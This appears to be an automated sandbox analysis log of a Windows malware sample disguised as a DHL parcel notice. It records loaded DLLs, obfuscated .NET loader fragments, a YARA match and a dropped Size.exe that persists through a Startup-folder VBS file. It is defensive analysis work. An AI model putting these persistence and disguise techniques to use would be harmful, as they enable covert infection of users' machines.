Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2117069451.0000000006940000.00000004.08000000.00040000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003644000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3287428643.0000000000459000.00000040.00000400.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003739000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2117069451.0000000006940000.00000004.08000000.00040000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003644000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs

.Net Code: Type.GetTypeFromHandle(TaPwR3ltfKSoCRnOdqf.oxDsHwmYgx(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(TaPwR3ltfKSoCRnOdqf.oxDsHwmYgx(16777252)),Type.GetTypeFromHandle(TaPwR3ltfKSoCRnOdqf.oxDsHwmYgx(16777284))})

.NET source code contains potential unpacker

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: Size.exe.0.dr, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6940000.14.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3837d70.9.raw.unpack, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.4010058.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6660000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3c44de8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.39fba20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2116282473.0000000006660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Size.exe PID: 6472, type: MEMORYSTR

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065C5ED1 push es; ret	0_2_065C5EE0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065EE18A push es; iretd	0_2_065EE18C
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06759E40 pushad ; iretd	0_2_06759E41
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06755F93 push es; iretd	0_2_06755F98
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06755CF9 push es; retf	0_2_06755D00
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067504E5 push edi; ret	0_2_067504E6
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_0675616D push es; ret	0_2_06756170
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067783D8 push esp; iretd	0_2_067783E5
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067A3E6A push ebp; ret	0_2_067A3E71
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069E6CD2 push es; ret	0_2_069E6CD4
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069E9522 push es; ret	0_2_069E9538
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069E89B6 push es; iretd	0_2_069E89C0
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06ED6922 push 0000007Bh; iretd	6_2_06ED6924
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EF982D push es; iretd	6_2_06EF9844
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EFE18A push es; iretd	6_2_06EFE18C
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_070604E5 push edi; ret	6_2_070604E6
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07069E40 pushad ; iretd	6_2_07069E41
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_070883E0 push esp; iretd	6_2_070883E5
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_070B3E6A push ebp; ret	6_2_070B3E71
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_072F68FE push esp; retf	6_2_072F6909
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07362567 push cs; retf	6_2_07362568
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_073670F3 pushad ; ret	6_2_073670FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00401E41 pushad ; ret	7_2_00402461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00402462 pushad ; ret	7_2_00402461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_00401B28 push edi; retn 0041h	7_2_00401B29

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'xNa3FrLMhl8YGIxphVY'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, Sbf77AJn5ExCDWPeq9W.cs	High entropy of concatenated method names: 'VuLUEkLNtlDPx2wWRdy', 'I0y0OyLeKKrkev6Jgp5', 'bvJllCCn3a', 'Ruobt9LyOWNcSa9m2v5', 'SvoidxLRmndcWLjZ6kH', 'GQbCfULXxFENYRtLYsD', 'YG0GpeLD5lA8oTKiyjt', 'lVCVZQLcE7l4JCF3ex0', 'KG5mOYLIPJSpsl0KiWn', 'AtmnFaLuRcXaqNSaggt'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, JXO1ARJ8lip2dwpw60Q.cs	High entropy of concatenated method names: 'ifAJpgWSg2', 'mOhJBZiQof', 'US3JCQKLQHbSqsKeX0h', 'dSPAj9K4kKsvysulfi5', 'OPeJZaKUk8BBjapIh0U', 'PAa7mwK2ObhaX7xX8U4', 'A0oN8jKNnC5HG3FEkZ3', 'Sf790GKeucc9CMQCR3f', 'wYR0I0KsAbaCoY506mG', 'pB7N0HKahNuHyLv3sBV'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, iQOIyFE3AYFG66jY7BP.cs	High entropy of concatenated method names: 'lVXEOHtvBh', 'slPQ9tnqjqaaKtgyuEg', 'v67B1Xn5JypxfgWwr3C', 'iqCxs9nK35G4R686ghW', 'NQATQInLPhy12kjKJiq', 'cByJNBnfaLn15UJwn7A', 'JFHnoDnn1V4FeHrXreZ'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, UQDh9klqiqDgU6fhnv9.cs	High entropy of concatenated method names: 'Bsllyn3y7a', 'dvglR3KOFK', 'Qc5lXxaw74', 'rRulDFfwVt', 'i4YlcBACw2', 'AdJlIsUXFW', 'G9LluSgbEX', 'gUqlZS6OOf', 'Ac7l0KK3Hg', 'bBflmAtGk7'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, IXdwtElzfovCAbqj9TG.cs	High entropy of concatenated method names: 'p4E13mVSgb', 'Eai17n65rA', 'VeT1OvvhBR', 'U131wqNqiV', 'C4R1ohkKrJ', 'tib1rTGWAm', 'a1b1GiHf6n', 'TFSFj6fkxX', 'fmD1SXq2D9', 'vem1tbfckt'
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack, SrRJ8JxtigNbIT1b4JS.cs	High entropy of concatenated method names: 'cr4xYRtQp1', 'mMWxfAwbS0', 'kdMxnlRZ0R', 'iipxq1t124', 'ENZx5Vu5R9', 'Wi4Btaq1MfKQBp4QRRE', 'KjuNb6qpcg6eVtRfKWr', 'coGK5xqBwnoJc4gwLJZ', 'rQTlP3qvJplDQWr8M0x', 'LERreiqkmYeOTjWyTKU'

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	File created: \dhl parcel-cbm is 3.1- total weight is 435kgs.==woe1910053_____________________________.exe
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	File created: \dhl parcel-cbm is 3.1- total weight is 435kgs.==woe1910053_____________________________.exe			Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File created: C:\Users\user\AppData\Roaming\Size.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Size.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
